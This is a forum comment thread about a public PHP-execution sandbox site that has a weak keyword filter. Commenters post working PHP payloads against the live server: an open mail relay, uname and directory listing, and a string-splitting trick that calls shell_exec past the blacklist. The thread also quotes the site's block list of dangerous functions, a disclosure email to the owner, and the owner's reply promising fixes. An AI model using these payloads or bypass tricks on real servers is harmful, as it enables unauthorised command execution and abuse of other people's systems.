18 comments

[ 3.0 ms ] story [ 53.5 ms ] thread
Sweet, an open mail relay:

<?php echo `echo 'hello' | mail -s Hello darth.vader@yahright.com`; ?>

Looks like they left a few other things open too =X
Ya, although curl is disabled.

A fun one: <?php echo `uname -a `; ?> Output: Linux fuel.bravegamer.com 2.6.18-128.1.10.el5PAE #1 SMP Thu May 7 11:14:31 EDT 2009 i686 i686 i386 GNU/Linux

"curl" is disabled... "cu" . "rl" isn't. ;-)
Poor guy didn't think this through very well...

    <?php
    $fn = "shel" . "l_exe" . "c";
    echo nl2br(htmlentities($fn("cat response.php")));
    ?>
Only "security" is this array of items which are regexed out of whatever you submit (and as you pointed out, completely fail to even prevent those functions from being called.

$replace = array('<?php', '?>', '<?', 'mkdir', 'eval', 'exec', 'copy', 'move', 'curl', 'passthru', 'system', 'popen', 'proc_close', 'proc_open', 'proc_ terminate', 'proc_nice', 'shell', 'dl');

It's not just an emulator, it's running real, full PHP (try PHPINFO).

Not in safe-mode, also running eaccelerator. It will be cracked within a week, I am sure.

  $handle = opendir('.');   
  while (false !== ($file = readdir($handle))) {echo "$file\n";}
A week? I wouldn't give it that long.
The poor guy could take quercus and make it safe. He didn't because he's still a PHP kid.
Explored a bit and sent the guy an email at the whois address of another domain that seems in his possession. The email address in scripterous.com seems broken. root@localhost doesn't seem to get read.

Hi,

Your site scripterous.com is a security leak for your server. I was able to kill web server processes, investigate your server, and generally do things I shouldn't be able to do. A denial of service attack would be easy by constantly killing the web server and if there was a local root exploit (which I didn't look for) I could have executed that as well.

I wanted to send an email to the root account on the server, but it doesn't seem to get read.

You can view a bit more of the discussion on the security implications at http://news.ycombinator.com/item?id=827500 (Despite the name and the subject we're discussing, that site is normally not about this kind of hacking.)

Your site is an interesting concept and it would definitely be interesting to have it around. Nonetheless I fear that the concept of the site is the cause of the security leaks. I'm not a security expert, but it is my opinion that it's not possible to make a site like this secure, without reimplementing PHP.

Best regards,

[Real name omitted, because I don't want this nick name to show up when people search my real name.]

Horrible security hole.

mail() is working.

Can read and browse various directories using opendir() and friends.

You can see some warning at the top of the page...

Warning (512): Cache not configured properly. Please check Cache::config(); in APP/config/core.php [CORE/cake/libs/configure.php, line 663]

Warning (2): array_merge() [function.array-merge]: Argument #1 is not an array [CORE/cake/libs/configure.php, line 684]

Warning (2): array_merge() [function.array-merge]: Argument #1 is not an array [CORE/cake/libs/configure.php, line 691]

...

Well, that is what I get for uploading and old project without taking in some consideration on it. Thank you to lucumo for the head's up on this and the rest of your for your exploits. Things should be a bit more secure now.